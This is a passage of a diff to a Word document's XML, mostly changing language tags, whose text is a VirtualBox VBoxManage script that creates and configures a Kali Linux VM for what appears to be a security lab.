+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Kali VM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> attack | +- 2min</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
       </w:r>
@@ -5251,23 +7412,23 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t># Register VM</w:t>
       </w:r>
@@ -5277,15 +7438,15 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -5294,7 +7455,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5303,7 +7464,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>createvm</w:t>
       </w:r>
@@ -5312,7 +7473,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> --name $KALI_VM --</w:t>
       </w:r>
@@ -5321,7 +7482,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>ostype</w:t>
       </w:r>
@@ -5330,7 +7491,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> 'Debian_64' --register</w:t>
       </w:r>
@@ -5340,41 +7501,51 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Set VM settings</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># Set VM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>settings</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -5383,7 +7554,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5392,7 +7563,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>modifyvm</w:t>
       </w:r>
@@ -5401,7 +7572,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> $KALI_VM --</w:t>
       </w:r>
@@ -5410,7 +7581,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>cpus</w:t>
       </w:r>
@@ -5419,7 +7590,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> $CPU --memory $RAM --</w:t>
       </w:r>
@@ -5428,7 +7599,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>graphicscontroller</w:t>
       </w:r>
@@ -5437,7 +7608,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5446,7 +7617,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>vmsvga</w:t>
       </w:r>
@@ -5455,7 +7626,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> --</w:t>
       </w:r>
@@ -5464,7 +7635,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>vram</w:t>
       </w:r>
@@ -5473,7 +7644,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> $VRAM --nic1 </w:t>
       </w:r>
@@ -5482,7 +7653,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>natnetwork</w:t>
       </w:r>
@@ -5491,7 +7662,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> --nat-network1 $</w:t>
       </w:r>
@@ -5500,7 +7671,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
       </w:r>
@@ -5509,51 +7680,133 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --clipboard-mode bidirectional --drag-and-drop bidirectional</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Add a SATA storage controller</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --clipboard-mode </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>bidirectional</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --drag-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-drop </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>bidirectional</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Add</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>SATA storage</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> controller</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -5562,7 +7815,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5571,7 +7824,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>storagectl</w:t>
       </w:r>
@@ -5580,16 +7833,34 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $KALI_VM --name 'SATA' --add </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $KALI_VM --name 'SATA' --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>add</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>sata</w:t>
       </w:r>
@@ -5598,7 +7869,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> --controller </w:t>
       </w:r>
@@ -5607,7 +7878,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>IntelAHCI</w:t>
       </w:r>
@@ -5616,51 +7887,133 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --bootable on</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Add existing VDI to SATA controller</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>bootable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Add</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>existing</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> VDI </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>SATA controller</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
       </w:r>
@@ -5669,7 +8022,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -5678,7 +8031,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>storageattach</w:t>
       </w:r>
@@ -5687,7 +8040,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> $KALI_VM --</w:t>
       </w:r>
@@ -5696,7 +8049,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>storagectl</w:t>
       </w:r>
@@ -5705,7 +8058,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> 'SATA' --port 0 --device 0 --type </w:t>
       </w:r>
@@ -5714,7 +8067,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>hdd</w:t>
       </w:r>
@@ -5723,34 +8076,16 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --medium </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>'.\VDI\Kali</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Linux 2023.4 (64bit).</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --medium '.\VDI\Kali Linux 2023.4 (64bit).</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>vdi</w:t>
       </w:r>
@@ -5759,7 +8094,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>'</w:t>
       </w:r>
@@ -5769,32 +8104,50 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Add </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>Add</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxGuestAdditions</w:t>
       </w:r>
@@ -5803,25 +8156,43 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> to VM</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>to</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>VBoxManage</w:t>
@@ -5831,7 +8202,7 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
